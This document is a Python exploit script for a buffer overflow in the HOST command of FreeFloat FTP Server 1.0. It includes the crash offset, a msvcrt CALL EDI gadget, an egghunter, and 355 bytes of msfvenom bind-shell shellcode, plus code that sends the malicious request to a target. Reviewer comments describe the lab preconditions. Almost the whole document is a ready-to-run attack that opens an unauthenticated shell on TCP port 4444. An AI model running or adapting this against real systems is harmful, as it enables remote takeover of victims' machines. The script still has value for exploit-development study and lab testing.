
FreeFloat FTP Server 1.0 HOST Buffer Overflow

Posted on 07 November 2017

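#!/usr/bin/env python3
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
# Date: 11/05/2017
# Exploit Author: 1N3@CrowdShield - https://crowdshield
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)
# CVE : N/A
#
# Reviewer notes:
#   * "DEP disabled" is a hard precondition: the shellcode runs out of the
#     overflowed request data that the egghunter locates in memory.
#   * The only gadget used is a CALL EDI at 0x77D918F6 in msvcrt.dll, found
#     with !mona on the tested Vista SP2 x86 box.  On any other build or patch
#     level re-locate the gadget, and confirm that msvcrt.dll actually loads at
#     the same base across reboots there before trusting the "ASLR bypass".
#   * The payload is an unauthenticated bind shell on TCP/4444 (msfvenom
#     windows/shell_bind_tcp): anyone who can reach the target can take it.
#     Use only in an isolated lab.
#   * The request is terminated with a single space and no CRLF, exactly as in
#     the original PoC; that is what was tested against the server.
from __future__ import annotations

import socket
import struct
import sys

# Target; both can be overridden on the command line: exploit.py <host> [port]
HOST = "10.0.0.39"
PORT = 21

# Bytes msfvenom was told to avoid (-b "\x0a\x00\x0d"); presumably the command
# parser terminates on them, so build_payload() refuses a request containing any.
BAD_CHARS = b"\x00\x0a\x0d"

# Crash with "HOST " + "A"*246 + "B"*4 + "C"*745 + " " (exact match at offset 246):
#   EIP 42424242   ESP 01C7FC00 -> "CCCC..."   EDI 016D1D1F -> "CCCC..."
#   ESI 0040A29E FTPServer.0040A29E
# !mona suggest on the cyclic pattern:
#   EIP contains normal pattern 0x41326941 (offset 246)
#   ESP points at offset 258 in the pattern (length 742)
#   EDI points at offset 727 in the pattern (length 273)
EIP_OFFSET = 246

# CALL EDI in C:\Windows\system32\msvcrt.dll (mona "Found commands", item 5241).
# Valid for the tested build only - see the reviewer notes above.
CALL_EDI_MSVCRT = 0x77D918F6

# Egg tag the hunter searches for.  It is written twice in front of the
# shellcode (8 bytes), so the real prefix is 8 bytes, not the 4 the original
# "355 bytes + 4 byte egg = 359 bytes" note counts: BIND_SHELL is 363 bytes.
EGG_TAG = b"T00W"

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python -b "\x0a\x00\x0d"
# Payload size: 355 bytes
SHELLCODE = (
    b"\xdd\xc2\xbf\x9a\xa8\x28\x21\xd9\x74\x24\xf4\x5d\x33"
    b"\xc9\xb1\x53\x31\x7d\x17\x83\xc5\x04\x03\xe7\xbb\xca"
    b"\xd4\xeb\x54\x88\x17\x13\xa5\xed\x9e\xf6\x94\x2d\xc4"
    b"\x73\x86\x9d\x8e\xd1\x2b\x55\xc2\xc1\xb8\x1b\xcb\xe6"
    b"\x09\x91\x2d\xc9\x8a\x8a\x0e\x48\x09\xd1\x42\xaa\x30"
    b"\x1a\x97\xab\x75\x47\x5a\xf9\x2e\x03\xc9\xed\x5b\x59"
    b"\xd2\x86\x10\x4f\x52\x7b\xe0\x6e\x73\x2a\x7a\x29\x53"
    b"\xcd\xaf\x41\xda\xd5\xac\x6c\x94\x6e\x06\x1a\x27\xa6"
    b"\x56\xe3\x84\x87\x56\x16\xd4\xc0\x51\xc9\xa3\x38\xa2"
    b"\x74\xb4\xff\xd8\xa2\x31\x1b\x7a\x20\xe1\xc7\x7a\xe5"
    b"\x74\x8c\x71\x42\xf2\xca\x95\x55\xd7\x61\xa1\xde\xd6"
    b"\xa5\x23\xa4\xfc\x61\x6f\x7e\x9c\x30\xd5\xd1\xa1\x22"
    b"\xb6\x8e\x07\x29\x5b\xda\x35\x70\x34\x2f\x74\x8a\xc4"
    b"\x27\x0f\xf9\xf6\xe8\xbb\x95\xba\x61\x62\x62\xbc\x5b"
    b"\xd2\xfc\x43\x64\x23\xd5\x87\x30\x73\x4d\x21\x39\x18"
    b"\x8d\xce\xec\xb5\x85\x69\x5f\xa8\x68\xc9\x0f\x6c\xc2"
    b"\xa2\x45\x63\x3d\xd2\x65\xa9\x56\x7b\x98\x52\x49\x20"
    b"\x15\xb4\x03\xc8\x73\x6e\xbb\x2a\xa0\xa7\x5c\x54\x82"
    b"\x9f\xca\x1d\xc4\x18\xf5\x9d\xc2\x0e\x61\x16\x01\x8b"
    b"\x90\x29\x0c\xbb\xc5\xbe\xda\x2a\xa4\x5f\xda\x66\x5e"
    b"\xc3\x49\xed\x9e\x8a\x71\xba\xc9\xdb\x44\xb3\x9f\xf1"
    b"\xff\x6d\xbd\x0b\x99\x56\x05\xd0\x5a\x58\x84\x95\xe7"
    b"\x7e\x96\x63\xe7\x3a\xc2\x3b\xbe\x94\xbc\xfd\x68\x57"
    b"\x16\x54\xc6\x31\xfe\x21\x24\x82\x78\x2e\x61\x74\x64"
    b"\x9f\xdc\xc1\x9b\x10\x89\xc5\xe4\x4c\x29\x29\x3f\xd5"
    b"\x59\x60\x1d\x7c\xf2\x2d\xf4\x3c\x9f\xcd\x23\x02\xa6"
    b"\x4d\xc1\xfb\x5d\x4d\xa0\xfe\x1a\xc9\x59\x73\x32\xbc"
    b"\x5d\x20\x33\x95"
)
BIND_SHELL = EGG_TAG * 2 + SHELLCODE

# 32-byte egghunter (Skape's int 0x2e variant): it walks memory a page at a
# time, probing each page with push 2 / pop eax / int 2e and skipping it when
# the call fails, then scasd-compares against the doubled tag (mov eax, "T00W")
# and `jmp edi` into whatever follows it.  The int 0x2e syscall path must be
# usable on the target; it was on the tested Vista box.
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)


def build_payload(ret_addr: int = CALL_EDI_MSVCRT) -> bytes:
    """Assemble the malicious HOST request.

    Layout (offsets from the start of the request):
        0    "HOST "
        5    246 x 'A'             filler up to the saved return address
      251    ret_addr, little-endian (CALL EDI gadget)
      255    10 x NOP
      265    "T00WT00W" + shellcode (363 bytes)
      628    241 x NOP             per mona EDI lands in this sled ...
      869    32-byte egghunter     ... which slides here; it finds the tag
      901    " "                   trailing space, as in the original PoC

    ret_addr: address of a CALL EDI (or equivalent) gadget on the target;
        defaults to the one found on the tested Vista SP2 x86 build.
    Returns the request as bytes.
    Raises ValueError if any of BAD_CHARS ends up in the request (e.g. a
        ret_addr that contains 0x00/0x0a/0x0d).
    """
    eip = struct.pack("<I", ret_addr)
    payload = b"".join((
        b"HOST ",
        b"\x41" * EIP_OFFSET,
        eip,
        b"\x90" * 10,
        BIND_SHELL,
        b"\x90" * 241,
        EGGHUNTER,
        b" ",
    ))
    bad = [c for c in BAD_CHARS if c in payload]
    if bad:
        raise ValueError(
            "payload contains bad char(s): " + ", ".join(f"0x{c:02x}" for c in bad)
        )
    return payload


def send_payload(host: str = HOST, port: int = PORT,
                 payload: bytes | None = None, timeout: float = 10.0) -> bytes:
    """Connect to the FTP server, read its banner and send the request.

    The timeout applies to the connect, the banner read and the send, so a
    server that never answers cannot hang the script.  Returns the banner.
    Raises OSError (incl. socket.timeout) on any network failure.
    """
    if payload is None:
        payload = build_payload()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        banner = sock.recv(1024)
        print(banner.decode("ascii", "replace").rstrip())
        print(f"Sending {len(payload)}-byte HOST request...")
        # sendall on the connected stream socket; the original used sendto()
        # with an address, which is not meaningful on a connected TCP socket.
        sock.sendall(payload)
        print("Sent!")
    return banner


def main(argv: list[str] | None = None) -> int:
    """CLI entry point: exploit.py [host] [port]. Returns the exit status."""
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if args else HOST
    port = int(args[1]) if len(args) > 1 else PORT
    try:
        send_payload(host, port)
    except OSError as exc:
        print(f"socket connection failed: {exc}", file=sys.stderr)
        return 1
    print("Done!")
    return 0


if __name__ == "__main__":
    sys.exit(main())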

 
